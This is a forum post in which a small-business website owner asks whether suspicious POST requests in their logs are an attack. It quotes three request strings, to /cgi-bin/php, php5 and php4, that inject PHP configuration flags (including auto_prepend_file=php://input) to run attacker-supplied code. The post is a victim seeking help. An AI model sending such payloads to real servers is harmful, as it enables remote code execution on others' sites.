我会先说我不是网络开发人员,我在这个领域也没有太多知识。我是一名企业主,我的客户购买产品的网站数量很少。几分钟前我注意到了这组查询,对于我这个外行人来说,它们看起来非常可疑。看起来好像他们正试图从我的数据库中提取数据?我可能完全错了,但是请有人告诉我他们认为这里发生了什么。
笔记:
- 当大多数普通观众被列为 GET 时,所有都以 POST 方法列出。
- 下面的所有内容都紧跟在我的域名之后,例如 examplesite.com/xxxxxxxx
以下是查询:
/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n
/cgi-bin/php5?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n
/cgi-bin/php4?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin%2Esimulation%3Don+-d+disable_functions%3D""+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi%2Eforce_redirect%3D0+-d+cgi%2Eredirect_status_env%3D0+-n
还有大约 6 个类似的查询。
注意:当我点击该链接时,我的网站给出了找不到页面的错误。当我尝试访问 site.com/cgi-bin/ 时,我的主机收到了 stock 403 禁止错误。
请问有什么想法吗?我在这里偏执吗?
编辑:另外,在我的文件管理器中,我的 cgi-bin 文件夹是空的:“这个目录是空的”。